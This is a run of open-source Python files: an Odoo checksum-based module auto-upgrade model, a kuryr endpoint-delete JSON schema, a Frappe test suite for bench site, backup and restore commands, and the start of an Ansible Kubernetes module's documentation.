        "SELECT name FROM ir_module_module "
        "WHERE id IN %s AND state != %s",
        (tuple(modules.ids), state),
    )
    bad_names = [row[0] for row in env.cr.fetchall()]
    if bad_names:
        raise FailedUpgradeError(
            "The following modules should be in state '%s' "
            "at this stage: %s. Bailing out for safety." %
            (state, ','.join(bad_names), ),
        )
class Module(models.Model):
    """Extend ir.module.module with checksum-based automatic upgrades."""
    _inherit = 'ir.module.module'
    @api.multi
    def _get_checksum_dir(self):
        """Return the hash of this module's on-disk source tree.

        Files matching the configured exclude patterns are skipped;
        the installed language codes are passed to addon_hash
        (presumably to ignore translations for other languages —
        confirm in addon_hash). Returns False when the module
        directory does not exist.
        """
        self.ensure_one()
        exclude_patterns = self.env["ir.config_parameter"].get_param(
            PARAM_EXCLUDE_PATTERNS,
            DEFAULT_EXCLUDE_PATTERNS,
        )
        exclude_patterns = [p.strip() for p in exclude_patterns.split(',')]
        keep_langs = self.env['res.lang'].search([]).mapped('code')
        module_path = get_module_path(self.name)
        if module_path and os.path.isdir(module_path):
            checksum_dir = addon_hash(
                module_path,
                exclude_patterns,
                keep_langs,
            )
        else:
            checksum_dir = False
        return checksum_dir
    @api.model
    def _get_saved_checksums(self):
        """Load the checksum map saved at the last successful upgrade."""
        Icp = self.env['ir.config_parameter']
        return json.loads(Icp.get_param(PARAM_INSTALLED_CHECKSUMS, '{}'))
    @api.model
    def _save_checksums(self, checksums):
        """Persist `checksums` (dict: module name -> hash) as JSON."""
        Icp = self.env['ir.config_parameter']
        Icp.set_param(PARAM_INSTALLED_CHECKSUMS, json.dumps(checksums))
    @api.model
    def _save_installed_checksums(self):
        """Recompute and save the checksums of all installed modules."""
        checksums = {}
        installed_modules = self.search([('state', '=', 'installed')])
        for module in installed_modules:
            checksums[module.name] = module._get_checksum_dir()
        self._save_checksums(checksums)
    @api.model
    def _get_modules_partially_installed(self):
        """Return modules stuck in a transitional (to *) state."""
        return self.search([
            ('state', 'in', ('to install', 'to remove', 'to upgrade')),
        ])
    @api.model
    def _get_modules_with_changed_checksum(self):
        """Return installed modules whose source hash differs from the
        one saved at the last successful upgrade."""
        saved_checksums = self._get_saved_checksums()
        installed_modules = self.search([('state', '=', 'installed')])
        return installed_modules.filtered(
            lambda r: r._get_checksum_dir() != saved_checksums.get(r.name),
        )
    @api.model
    def upgrade_changed_checksum(self, overwrite_existing_translations=False):
        """Run an upgrade of the database, upgrading only changed modules.
        Installed modules for which the checksum has changed since the
        last successful run of this method are marked "to upgrade",
        then the normal Odoo scheduled upgrade process
        is launched.
        If there is no module with a changed checksum, and no module in state
        other than installed, uninstalled, uninstallable, this method does
        nothing, otherwise the normal Odoo upgrade process is launched.
        After a successful upgrade, the checksums of installed modules are
        saved.
        In case of error during the upgrade, an exception is raised.
        If any module remains to upgrade or to uninstall after the upgrade
        process, an exception is raised as well.
        Note: this method commits the current transaction at each important
        step, it is therefore not intended to be run as part of a
        larger transaction.
        """
        _logger.info(
            "Checksum upgrade starting (i18n-overwrite=%s)...",
            overwrite_existing_translations
        )
        tools.config['overwrite_existing_translations'] = \
            overwrite_existing_translations
        _logger.info("Updating modules list...")
        self.update_list()
        changed_modules = self._get_modules_with_changed_checksum()
        if not changed_modules and not self._get_modules_partially_installed():
            _logger.info("No checksum change detected in installed modules "
                         "and all modules installed, nothing to do.")
            return
        _logger.info("Marking the following modules to upgrade, "
                     "for their checksums changed: %s...",
                     ','.join(changed_modules.mapped('name')))
        changed_modules.button_upgrade()
        self.env.cr.commit()  # pylint: disable=invalid-commit
        # in rare situations, button_upgrade may fail without
        # exception, this would lead to corruption because
        # no upgrade would be performed and save_installed_checksums
        # would update checksums for modules that have not been upgraded
        ensure_module_state(self.env, changed_modules, 'to upgrade')
        _logger.info("Upgrading...")
        self.env['base.module.upgrade'].upgrade_module()
        self.env.cr.commit()  # pylint: disable=invalid-commit
        _logger.info("Upgrade successful, updating checksums...")
        self._save_installed_checksums()
        self.env.cr.commit()  # pylint: disable=invalid-commit
        partial_modules = self._get_modules_partially_installed()
        if partial_modules:
            raise IncompleteUpgradeError(
                "Checksum upgrade successful "
                "but incomplete for the following modules: %s" %
                ','.join(partial_modules.mapped('name'))
            )
        _logger.info("Checksum upgrade complete.")
| ddico/server-tools | module_auto_update/models/module.py | Python | agpl-3.0 | 6,204 | 0 |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from kuryr.schemata import commons
# JSON hyper-schema (draft-04) describing the request payload of the
# /NetworkDriver.DeleteEndpoint endpoint of the libnetwork remote driver
# protocol.
ENDPOINT_DELETE_SCHEMA = {
    u'links': [{
        u'method': u'POST',
        u'href': u'/NetworkDriver.DeleteEndpoint',
        u'description': u'Delete an Endpoint',
        u'rel': u'self',
        u'title': u'Delete'
    }],
    u'title': u'Delete endpoint',
    u'required': [u'NetworkID', u'EndpointID'],
    # Placeholder; the shared common definitions are spliced in below.
    u'definitions': {u'commons': {}},
    u'$schema': u'http://json-schema.org/draft-04/hyper-schema',
    u'type': u'object',
    u'properties': {
        u'NetworkID': {
            u'description': u'Network ID',
            u'$ref': u'#/definitions/commons/definitions/id'
        },
        u'EndpointID': {
            u'description': u'Endpoint ID',
            u'$ref': u'#/definitions/commons/definitions/id'
        }
    }
}
# Inject the shared common definitions so the $ref pointers resolve.
ENDPOINT_DELETE_SCHEMA[u'definitions'][u'commons'] = commons.COMMONS
| midonet/kuryr | kuryr/schemata/endpoint_delete.py | Python | apache-2.0 | 1,400 | 0 |
# Copyright (c) 2022, Frappe Technologies Pvt. Ltd. and Contributors
# License: MIT. See LICENSE
# imports - standard imports
import gzip
import importlib
import json
import os
import shlex
import shutil
import subprocess
import unittest
from contextlib import contextmanager
from functools import wraps
from glob import glob
from typing import List, Optional
from unittest.case import skipIf
from unittest.mock import patch
# imports - third party imports
import click
from click.testing import CliRunner, Result
from click import Command
# imports - module imports
import frappe
import frappe.commands.site
import frappe.commands.utils
import frappe.recorder
from frappe.installer import add_to_installed_apps, remove_app
from frappe.utils import add_to_date, get_bench_path, get_bench_relative_path, now
from frappe.utils.backups import fetch_latest_backups
# Holds the click Result of the most recent in-process `cli(...)`
# invocation, so _formatMessage can include it in failure output.
_result: Optional[Result] = None
TEST_SITE = "commands-site-O4PN2QKA.test"  # added random string tag to avoid collisions
# Stand-in context object passed to commands instead of a real click context.
CLI_CONTEXT = frappe._dict(sites=[TEST_SITE])
def clean(value):
    """Normalize a subprocess output value for comparison.

    Bytes are decoded to str; strings are stripped of surrounding
    whitespace. Any other type (e.g. an int return code) is returned
    unchanged — hence no `-> str` annotation.

    Args:
        value: raw value (bytes, str, or anything else).

    Returns:
        The decoded and/or stripped string, or `value` unchanged.
    """
    if isinstance(value, bytes):
        value = value.decode()
    if isinstance(value, str):
        value = value.strip()
    return value
def missing_in_backup(doctypes: List, file: os.PathLike) -> List:
    """Return the subset of `doctypes` absent from a backup dump.

    Args:
        doctypes (list): DocType names to look for.
        file (str): path to the gzipped SQL dump.

    Returns:
        list: DocTypes with no table definition in the dump.
    """
    # Table definitions look different in postgres vs mariadb dumps.
    if frappe.conf.db_type == "postgres":
        predicate = 'COPY public."tab{}"'
    else:
        predicate = "CREATE TABLE `tab{}`"
    with gzip.open(file, "rb") as backup:
        content = backup.read().decode("utf8").lower()
    return [
        doctype
        for doctype in doctypes
        if predicate.format(doctype).lower() not in content
    ]
def exists_in_backup(doctypes: List, file: os.PathLike) -> bool:
    """Check whether every DocType in `doctypes` exists in the dump.

    Args:
        doctypes (list): DocType names to be checked.
        file (str): path to the gzipped SQL dump.

    Returns:
        bool: True when no DocType is missing from the backup.
    """
    return not missing_in_backup(doctypes, file)
@contextmanager
def maintain_locals():
    """Preserve and restore frappe.local (site, flags, db) around the body.

    Commands run in-process may switch or tear down the current site;
    this re-initializes the original site afterwards if it changed, and
    restores the db handle and flags.
    """
    pre_site = frappe.local.site
    pre_flags = frappe.local.flags.copy()
    pre_db = frappe.local.db
    try:
        yield
    finally:
        post_site = getattr(frappe.local, "site", None)
        if not post_site or post_site != pre_site:
            # The command destroyed or switched the site: re-init ours.
            frappe.init(site=pre_site)
        frappe.local.db = pre_db
        frappe.local.flags.update(pre_flags)
def pass_test_context(f):
    """Decorator injecting the test CLI_CONTEXT as the first argument.

    Used to replace `frappe.commands.pass_context` while testing, so
    commands receive the fake context instead of a real click one.
    """
    @wraps(f)
    def wrapper(*args, **kwargs):
        return f(CLI_CONTEXT, *args, **kwargs)
    return wrapper
@contextmanager
def cli(cmd: Command, args: Optional[List] = None):
    """Invoke a frappe click command in-process and yield its Result.

    Patches `frappe.commands.pass_context` with `pass_test_context`,
    reloads the command's defining module so the patched decorator takes
    effect, runs the command with click's CliRunner, and on exit undoes
    the patch and reloads the module back to its pristine state.
    The Result is also stored in the module-global `_result` for
    failure reporting.
    """
    with maintain_locals():
        global _result
        patch_ctx = patch("frappe.commands.pass_context", pass_test_context)
        _module = cmd.callback.__module__
        _cmd = cmd.callback.__qualname__
        __module = importlib.import_module(_module)
        patch_ctx.start()
        # Reload so the module-level decorators pick up the patch.
        importlib.reload(__module)
        click_cmd = getattr(__module, _cmd)
        try:
            _result = CliRunner().invoke(click_cmd, args=args)
            _result.command = str(cmd)
            yield _result
        finally:
            patch_ctx.stop()
            # Restore the unpatched module for subsequent imports.
            __module = importlib.import_module(_module)
            importlib.reload(__module)
            importlib.invalidate_caches()
class BaseTestCommands(unittest.TestCase):
    """Base class for bench-command tests: shared site setup plus a
    subprocess helper that records stdout/stderr/returncode."""
    @classmethod
    def setUpClass(cls) -> None:
        cls.setup_test_site()
        return super().setUpClass()
    # NOTE(review): classmethod whose first parameter is named `self`;
    # it is actually bound to the class. Works, but `cls` would be the
    # conventional name.
    @classmethod
    def execute(self, command, kwargs=None):
        """Run `command` (a str.format template) as a subprocess.

        `{site}` is always available in the template; an optional
        `cmd_input` kwarg (bytes) is piped to stdin. Results are stored
        on the class as `stdout`, `stderr` and `returncode`.
        """
        site = {"site": frappe.local.site}
        cmd_input = None
        if kwargs:
            cmd_input = kwargs.get("cmd_input", None)
            if cmd_input:
                if not isinstance(cmd_input, bytes):
                    raise Exception(
                        f"The input should be of type bytes, not {type(cmd_input).__name__}"
                    )
                del kwargs["cmd_input"]
            kwargs.update(site)
        else:
            kwargs = site
        self.command = " ".join(command.split()).format(**kwargs)
        click.secho(self.command, fg="bright_black")
        command = shlex.split(self.command)
        self._proc = subprocess.run(command, input=cmd_input, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        self.stdout = clean(self._proc.stdout)
        self.stderr = clean(self._proc.stderr)
        self.returncode = clean(self._proc.returncode)
    @classmethod
    def setup_test_site(cls):
        """Create the shared TEST_SITE once, if it does not already exist."""
        cmd_config = {
            "test_site": TEST_SITE,
            "admin_password": frappe.conf.admin_password,
            "root_login": frappe.conf.root_login,
            "root_password": frappe.conf.root_password,
            "db_type": frappe.conf.db_type,
        }
        if not os.path.exists(
            os.path.join(TEST_SITE, "site_config.json")
        ):
            cls.execute(
                "bench new-site {test_site} --admin-password {admin_password} --db-type"
                " {db_type}",
                cmd_config,
            )
    def _formatMessage(self, msg, standardMsg):
        """Append a summary of the last executed command to failures."""
        output = super(BaseTestCommands, self)._formatMessage(msg, standardMsg)
        if not hasattr(self, "command") and _result:
            # Command was run in-process through `cli(...)`.
            command = _result.command
            stdout = _result.stdout_bytes.decode() if _result.stdout_bytes else None
            stderr = _result.stderr_bytes.decode() if _result.stderr_bytes else None
            returncode = _result.exit_code
        else:
            # Command was run through `execute(...)` as a subprocess.
            command = self.command
            stdout = self.stdout
            stderr = self.stderr
            returncode = self.returncode
        cmd_execution_summary = "\n".join([
            "-" * 70,
            "Last Command Execution Summary:",
            "Command: {}".format(command) if command else "",
            "Standard Output: {}".format(stdout) if stdout else "",
            "Standard Error: {}".format(stderr) if stderr else "",
            "Return Code: {}".format(returncode) if returncode else "",
        ]).strip()
        return "{}\n\n{}".format(output, cmd_execution_summary)
class TestCommands(BaseTestCommands):
    """End-to-end tests for assorted `bench` site commands."""
    def test_execute(self):
        """`bench execute` happy path, error path, and --kwargs parsing."""
        # test 1: execute a command expecting a numeric output
        self.execute("bench --site {site} execute frappe.db.get_database_size")
        self.assertEqual(self.returncode, 0)
        self.assertIsInstance(float(self.stdout), float)
        # test 2: execute a command expecting an errored output as local won't exist
        self.execute("bench --site {site} execute frappe.local.site")
        self.assertEqual(self.returncode, 1)
        self.assertIsNotNone(self.stderr)
        # test 3: execute a command with kwargs
        # Note:
        # terminal command has been escaped to avoid .format string replacement
        # The returned value has quotes which have been trimmed for the test
        self.execute("""bench --site {site} execute frappe.bold --kwargs '{{"text": "DocType"}}'""")
        self.assertEqual(self.returncode, 0)
        self.assertEqual(self.stdout[1:-1], frappe.bold(text="DocType"))
    @unittest.skip
    def test_restore(self):
        """`bench restore` from full and partial backups (skipped)."""
        # step 0: create a site to run the test on
        global_config = {
            "admin_password": frappe.conf.admin_password,
            "root_login": frappe.conf.root_login,
            "root_password": frappe.conf.root_password,
            "db_type": frappe.conf.db_type,
        }
        site_data = {"test_site": TEST_SITE, **global_config}
        for key, value in global_config.items():
            if value:
                self.execute(f"bench set-config {key} {value} -g")
        # test 1: bench restore from full backup
        self.execute("bench --site {test_site} backup --ignore-backup-conf", site_data)
        self.execute(
            "bench --site {test_site} execute frappe.utils.backups.fetch_latest_backups",
            site_data,
        )
        site_data.update({"database": json.loads(self.stdout)["database"]})
        self.execute("bench --site {test_site} restore {database}", site_data)
        # test 2: restore from partial backup
        self.execute("bench --site {test_site} backup --exclude 'ToDo'", site_data)
        site_data.update({"kw": "\"{'partial':True}\""})
        self.execute(
            "bench --site {test_site} execute"
            " frappe.utils.backups.fetch_latest_backups --kwargs {kw}",
            site_data,
        )
        site_data.update({"database": json.loads(self.stdout)["database"]})
        # restoring a partial backup into a site must be refused
        self.execute("bench --site {test_site} restore {database}", site_data)
        self.assertEqual(self.returncode, 1)
    def test_partial_restore(self):
        """`bench partial-restore` re-creates a dropped table's rows."""
        _now = now()
        for num in range(10):
            frappe.get_doc({
                "doctype": "ToDo",
                "date": add_to_date(_now, days=num),
                "description": frappe.mock("paragraph")
            }).insert()
        frappe.db.commit()
        todo_count = frappe.db.count("ToDo")
        # check if todos exist, create a partial backup and see if the state is the same after restore
        self.assertIsNot(todo_count, 0)
        self.execute("bench --site {site} backup --only 'ToDo'")
        db_path = fetch_latest_backups(partial=True)["database"]
        self.assertTrue("partial" in db_path)
        frappe.db.sql_ddl("DROP TABLE IF EXISTS `tabToDo`")
        frappe.db.commit()
        self.execute("bench --site {site} partial-restore {path}", {"path": db_path})
        self.assertEqual(self.returncode, 0)
        self.assertEqual(frappe.db.count("ToDo"), todo_count)
    def test_recorder(self):
        """start-recording / stop-recording toggle the recorder status."""
        frappe.recorder.stop()
        self.execute("bench --site {site} start-recording")
        frappe.local.cache = {}  # drop cached status before re-reading it
        self.assertEqual(frappe.recorder.status(), True)
        self.execute("bench --site {site} stop-recording")
        frappe.local.cache = {}
        self.assertEqual(frappe.recorder.status(), False)
    def test_remove_from_installed_apps(self):
        """remove-from-installed-apps drops the app from the site list."""
        app = "test_remove_app"
        add_to_installed_apps(app)
        # check: confirm that add_to_installed_apps added the app in the default
        self.execute("bench --site {site} list-apps")
        self.assertIn(app, self.stdout)
        # test 1: remove app from installed_apps global default
        self.execute("bench --site {site} remove-from-installed-apps {app}", {"app": app})
        self.assertEqual(self.returncode, 0)
        self.execute("bench --site {site} list-apps")
        self.assertNotIn(app, self.stdout)
    def test_list_apps(self):
        """list-apps output matches the installed apps, in text and JSON."""
        # test 1: sanity check for command
        self.execute("bench --site all list-apps")
        self.assertIsNotNone(self.returncode)
        self.assertIsInstance(self.stdout or self.stderr, str)
        # test 2: bare functionality for single site
        self.execute("bench --site {site} list-apps")
        self.assertEqual(self.returncode, 0)
        list_apps = set(
            _x.split()[0] for _x in self.stdout.split("\n")
        )
        doctype = frappe.get_single("Installed Applications").installed_applications
        if doctype:
            installed_apps = set(x.app_name for x in doctype)
        else:
            installed_apps = set(frappe.get_installed_apps())
        self.assertSetEqual(list_apps, installed_apps)
        # test 3: parse json format
        self.execute("bench --site {site} list-apps --format json")
        self.assertEqual(self.returncode, 0)
        self.assertIsInstance(json.loads(self.stdout), dict)
        self.execute("bench --site {site} list-apps -f json")
        self.assertEqual(self.returncode, 0)
        self.assertIsInstance(json.loads(self.stdout), dict)
    def test_show_config(self):
        """show-config renders nested keys and supports JSON output."""
        # test 1: sanity check for command
        self.execute("bench --site all show-config")
        self.assertEqual(self.returncode, 0)
        # test 2: test keys in table text
        self.execute(
            "bench --site {site} set-config test_key '{second_order}' --parse",
            {"second_order": json.dumps({"test_key": "test_value"})},
        )
        self.execute("bench --site {site} show-config")
        self.assertEqual(self.returncode, 0)
        self.assertIn("test_key.test_key", self.stdout.split())
        self.assertIn("test_value", self.stdout.split())
        # test 3: parse json format
        self.execute("bench --site all show-config --format json")
        self.assertEqual(self.returncode, 0)
        self.assertIsInstance(json.loads(self.stdout), dict)
        self.execute("bench --site {site} show-config --format json")
        self.assertIsInstance(json.loads(self.stdout), dict)
        self.execute("bench --site {site} show-config -f json")
        self.assertIsInstance(json.loads(self.stdout), dict)
    def test_get_bench_relative_path(self):
        """get_bench_relative_path resolves files and exits on missing ones."""
        bench_path = get_bench_path()
        test1_path = os.path.join(bench_path, "test1.txt")
        test2_path = os.path.join(bench_path, "sites", "test2.txt")
        with open(test1_path, "w+") as test1:
            test1.write("asdf")
        with open(test2_path, "w+") as test2:
            test2.write("asdf")
        self.assertTrue("test1.txt" in get_bench_relative_path("test1.txt"))
        self.assertTrue("sites/test2.txt" in get_bench_relative_path("test2.txt"))
        with self.assertRaises(SystemExit):
            get_bench_relative_path("test3.txt")
        os.remove(test1_path)
        os.remove(test2_path)
    def test_frappe_site_env(self):
        """The FRAPPE_SITE env var selects the site when --site is absent."""
        os.putenv('FRAPPE_SITE', frappe.local.site)
        self.execute("bench execute frappe.ping")
        self.assertEqual(self.returncode, 0)
        self.assertIn("pong", self.stdout)
    def test_version(self):
        """`bench version` works for all output formats, fails for bogus."""
        self.execute("bench version")
        self.assertEqual(self.returncode, 0)
        for output in ["legacy", "plain", "table", "json"]:
            self.execute(f"bench version -f {output}")
            self.assertEqual(self.returncode, 0)
        self.execute("bench version -f invalid")
        self.assertEqual(self.returncode, 2)
    def test_set_password(self):
        """set-password / set-admin-password update the stored password."""
        from frappe.utils.password import check_password
        self.execute("bench --site {site} set-password Administrator test1")
        self.assertEqual(self.returncode, 0)
        self.assertEqual(check_password('Administrator', 'test1'), 'Administrator')
        # to release the lock taken by check_password
        frappe.db.commit()
        self.execute("bench --site {site} set-admin-password test2")
        self.assertEqual(self.returncode, 0)
        self.assertEqual(check_password('Administrator', 'test2'), 'Administrator')
    def test_make_app(self):
        """make-app scaffolds a new app from interactive prompt answers."""
        user_input = [
            b"Test App",  # title
            b"This app's description contains 'single quotes' and \"double quotes\".",  # description
            b"Test Publisher",  # publisher
            b"example@example.org",  # email
            b"",  # icon
            b"",  # color
            b"MIT"  # app_license
        ]
        app_name = "testapp0"
        apps_path = os.path.join(get_bench_path(), "apps")
        test_app_path = os.path.join(apps_path, app_name)
        self.execute(f"bench make-app {apps_path} {app_name}", {"cmd_input": b'\n'.join(user_input)})
        self.assertEqual(self.returncode, 0)
        self.assertTrue(
            os.path.exists(test_app_path)
        )
        # cleanup
        shutil.rmtree(test_app_path)
    @skipIf(
        not (
            frappe.conf.root_password
            and frappe.conf.admin_password
            and frappe.conf.db_type == "mariadb"
        ),
        "DB Root password and Admin password not set in config"
    )
    def test_bench_drop_site_should_archive_site(self):
        """drop-site moves the site directory under archived/sites."""
        # TODO: Make this test postgres compatible
        site = TEST_SITE
        self.execute(
            f"bench new-site {site} --force --verbose "
            f"--admin-password {frappe.conf.admin_password} "
            f"--mariadb-root-password {frappe.conf.root_password} "
            f"--db-type {frappe.conf.db_type or 'mariadb'} "
        )
        self.assertEqual(self.returncode, 0)
        self.execute(f"bench drop-site {site} --force --root-password {frappe.conf.root_password}")
        self.assertEqual(self.returncode, 0)
        bench_path = get_bench_path()
        site_directory = os.path.join(bench_path, f'sites/{site}')
        self.assertFalse(os.path.exists(site_directory))
        archive_directory = os.path.join(bench_path, f'archived/sites/{site}')
        self.assertTrue(os.path.exists(archive_directory))
class TestBackups(BaseTestCommands):
	"""CLI-level tests for `bench backup` and its selective-backup options."""
	# Fixtures reused across tests: payloads for the site-config `backup`
	# key and for the --include/--exclude flags.
	backup_map = {
		"includes": {
			"includes": [
				"ToDo",
				"Note",
			]
		},
		"excludes": {
			"excludes": [
				"Activity Log",
				"Access Log",
				"Error Log"
			]
		}
	}
	home = os.path.expanduser("~")
	# Default on-disk location of site backups.
	site_backup_path = frappe.utils.get_site_path("private", "backups")
	def setUp(self):
		self.files_to_trash = []
	def tearDown(self):
		# Remove files registered during the "test_backup" flow and their
		# directory if it became empty.  NOTE(review): no method named
		# test_backup is visible in this class -- confirm it still exists.
		if self._testMethodName == "test_backup":
			for file in self.files_to_trash:
				os.remove(file)
				try:
					os.rmdir(os.path.dirname(file))
				except OSError:
					pass
	def test_backup_no_options(self):
		"""Take a backup without any options
		"""
		before_backup = fetch_latest_backups(partial=True)
		self.execute("bench --site {site} backup")
		after_backup = fetch_latest_backups(partial=True)
		self.assertEqual(self.returncode, 0)
		self.assertIn("successfully completed", self.stdout)
		# A fresh database dump must have been produced.
		self.assertNotEqual(before_backup["database"], after_backup["database"])
	def test_backup_with_files(self):
		"""Take a backup with files (--with-files)
		"""
		before_backup = fetch_latest_backups()
		self.execute("bench --site {site} backup --with-files")
		after_backup = fetch_latest_backups()
		self.assertEqual(self.returncode, 0)
		self.assertIn("successfully completed", self.stdout)
		self.assertIn("with files", self.stdout)
		self.assertNotEqual(before_backup, after_backup)
		# --with-files must produce both public and private file archives.
		self.assertIsNotNone(after_backup["public"])
		self.assertIsNotNone(after_backup["private"])
	def test_backup_with_custom_path(self):
		"""Backup to a custom path (--backup-path)
		"""
		backup_path = os.path.join(self.home, "backups")
		self.execute("bench --site {site} backup --backup-path {backup_path}", {"backup_path": backup_path})
		self.assertEqual(self.returncode, 0)
		self.assertTrue(os.path.exists(backup_path))
		# At least a database dump plus the site config are expected.
		self.assertGreaterEqual(len(os.listdir(backup_path)), 2)
	def test_backup_with_different_file_paths(self):
		"""Backup with different file paths (--backup-path-db, --backup-path-files, --backup-path-private-files, --backup-path-conf)
		"""
		# Build one target path per artifact under the home directory.
		kwargs = {
			key: os.path.join(self.home, key, value)
			for key, value in {
				"db_path": "database.sql.gz",
				"files_path": "public.tar",
				"private_path": "private.tar",
				"conf_path": "config.json",
			}.items()
		}
		self.execute(
			"""bench
			--site {site} backup --with-files
			--backup-path-db {db_path}
			--backup-path-files {files_path}
			--backup-path-private-files {private_path}
			--backup-path-conf {conf_path}""",
			kwargs,
		)
		self.assertEqual(self.returncode, 0)
		for path in kwargs.values():
			self.assertTrue(os.path.exists(path))
	def test_backup_compress_files(self):
		"""Take a compressed backup (--compress)
		"""
		self.execute("bench --site {site} backup --with-files --compress")
		self.assertEqual(self.returncode, 0)
		# --compress stores the file archives as .tgz instead of .tar.
		compressed_files = glob(f"{self.site_backup_path}/*.tgz")
		self.assertGreater(len(compressed_files), 0)
	def test_backup_verbose(self):
		"""Take a verbose backup (--verbose)
		"""
		self.execute("bench --site {site} backup --verbose")
		self.assertEqual(self.returncode, 0)
	def test_backup_only_specific_doctypes(self):
		"""Take a backup with (include) backup options set in the site config `frappe.conf.backup.includes`
		"""
		self.execute(
			"bench --site {site} set-config backup '{includes}' --parse",
			{"includes": json.dumps(self.backup_map["includes"])},
		)
		self.execute("bench --site {site} backup --verbose")
		self.assertEqual(self.returncode, 0)
		database = fetch_latest_backups(partial=True)["database"]
		# Every doctype listed in `includes` must be present in the dump.
		self.assertEqual([], missing_in_backup(self.backup_map["includes"]["includes"], database))
	def test_backup_excluding_specific_doctypes(self):
		"""Take a backup with (exclude) backup options set (`frappe.conf.backup.excludes`, `--exclude`)
		"""
		# test 1: take a backup with frappe.conf.backup.excludes
		self.execute(
			"bench --site {site} set-config backup '{excludes}' --parse",
			{"excludes": json.dumps(self.backup_map["excludes"])},
		)
		self.execute("bench --site {site} backup --verbose")
		self.assertEqual(self.returncode, 0)
		database = fetch_latest_backups(partial=True)["database"]
		self.assertFalse(exists_in_backup(self.backup_map["excludes"]["excludes"], database))
		self.assertEqual([], missing_in_backup(self.backup_map["includes"]["includes"], database))
		# test 2: take a backup with --exclude
		self.execute(
			"bench --site {site} backup --exclude '{exclude}'",
			{"exclude": ",".join(self.backup_map["excludes"]["excludes"])},
		)
		self.assertEqual(self.returncode, 0)
		database = fetch_latest_backups(partial=True)["database"]
		self.assertFalse(exists_in_backup(self.backup_map["excludes"]["excludes"], database))
	def test_selective_backup_priority_resolution(self):
		"""Take a backup with conflicting backup options set (`frappe.conf.excludes`, `--include`)
		"""
		# The explicit --include flag must win over site-config excludes.
		self.execute(
			"bench --site {site} backup --include '{include}'",
			{"include": ",".join(self.backup_map["includes"]["includes"])},
		)
		self.assertEqual(self.returncode, 0)
		database = fetch_latest_backups(partial=True)["database"]
		self.assertEqual([], missing_in_backup(self.backup_map["includes"]["includes"], database))
	def test_dont_backup_conf(self):
		"""Take a backup ignoring frappe.conf.backup settings (with --ignore-backup-conf option)
		"""
		self.execute("bench --site {site} backup --ignore-backup-conf")
		self.assertEqual(self.returncode, 0)
		database = fetch_latest_backups()["database"]
		# With the site config ignored, the "excluded" doctypes reappear.
		self.assertEqual([], missing_in_backup(self.backup_map["excludes"]["excludes"], database))
class TestRemoveApp(unittest.TestCase):
	"""Tests for the module/doctype cleanup helpers used by `bench remove-app`."""
	def test_delete_modules(self):
		"""Deleting a Module Def should cascade to doctypes linked to it."""
		from frappe.installer import (
			_delete_doctypes,
			_delete_modules,
			_get_module_linked_doctype_field_map,
		)
		# A throwaway module plus a custom doctype that links back to
		# Module Def through a Link field named "notmodule".
		test_module = frappe.new_doc("Module Def")
		test_module.update({"module_name": "RemoveThis", "app_name": "frappe"})
		test_module.save()
		module_def_linked_doctype = frappe.get_doc({
			"doctype": "DocType",
			"name": "Doctype linked with module def",
			"module": "RemoveThis",
			"custom": 1,
			"fields": [{
				"label": "Modulen't",
				"fieldname": "notmodule",
				"fieldtype": "Link",
				"options": "Module Def"
			}]
		}).insert()
		# The map must pick up both the stock "Report" link and our custom
		# doctype, keyed by doctype name with the linking fieldname as value.
		doctype_to_link_field_map = _get_module_linked_doctype_field_map()
		self.assertIn("Report", doctype_to_link_field_map)
		self.assertIn(module_def_linked_doctype.name, doctype_to_link_field_map)
		self.assertEqual(doctype_to_link_field_map[module_def_linked_doctype.name], "notmodule")
		self.assertNotIn("DocType", doctype_to_link_field_map)
		# Deleting the module must schedule exactly our linked doctype, and
		# a real (non-dry-run) delete must remove both records.
		doctypes_to_delete = _delete_modules([test_module.module_name], dry_run=False)
		self.assertEqual(len(doctypes_to_delete), 1)
		_delete_doctypes(doctypes_to_delete, dry_run=False)
		self.assertFalse(frappe.db.exists("Module Def", test_module.module_name))
		self.assertFalse(frappe.db.exists("DocType", module_def_linked_doctype.name))
	def test_dry_run(self):
		"""Check that a dry run is not destructive."""
		# nothing to assert, if this fails rest of the test suite will crumble.
		remove_app("frappe", dry_run=True, yes=True, no_backup=True)
class TestSiteMigration(BaseTestCommands):
	"""CLI-level checks for `bench migrate`."""
	def test_migrate_cli(self):
		# Run migrate through the click test runner; it must mention the
		# test site and finish cleanly.
		with cli(frappe.commands.site.migrate) as result:
			self.assertIn(TEST_SITE, result.stdout)
			self.assertEqual(result.exit_code, 0)
			self.assertIsNone(result.exception)
class TestBenchBuild(BaseTestCommands):
	"""CLI-level checks for `bench build`."""
	def test_build_assets(self):
		# Building assets must succeed without raising.
		with cli(frappe.commands.utils.build) as result:
			self.assertEqual(result.exit_code, 0)
			self.assertIsNone(result.exception)
| frappe/frappe | frappe/tests/test_commands.py | Python | mit | 22,402 | 0.025266 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
DOCUMENTATION = """
---
module: kube
short_description: Manage Kubernetes Cluster
description:
- Create, replace, remove, and stop resources within a Kubernetes Cluster
version_added: "2.0"
options:
name:
required: false
default: null
description:
- The name associated with resource
filename:
required: false
default: null
description:
- The path and filename of the resource(s) definition file(s).
- To operate on several files this can accept a comma separated list of files or a list of files.
aliases: [ 'files', 'file', 'filenames' ]
kubectl:
required: false
default: null
description:
- The path to the kubectl bin
namespace:
required: false
default: null
description:
- The namespace associated with the resource(s)
resource:
required: false
default: null
description:
- The resource to perform an action on. pods (po), replicationControllers (rc), services (svc)
label:
required: false
default: null
description:
- The labels used to filter specific resources.
server:
required: false
default: null
description:
- The url for the API server that commands are executed against.
force:
required: false
default: false
description:
- A flag to indicate to force delete, replace, or stop.
all:
required: false
default: false
description:
- A flag to indicate delete all, stop all, or all namespaces when checking exists.
log_level:
required: false
default: 0
description:
- Indicates the level of verbosity of logging by kubectl.
state:
required: false
choices: ['present', 'absent', 'latest', 'reloaded', 'stopped']
default: present
description:
- present handles checking existence or creating if definition file provided,
absent handles deleting resource(s) based on other options,
latest handles creating or updating based on existence,
reloaded handles updating resource(s) definition using definition file,
stopped handles stopping resource(s) based on other options.
requirements:
- kubectl
author: "Kenny Jones (@kenjones-cisco)"
"""
EXAMPLES = """
- name: test nginx is present
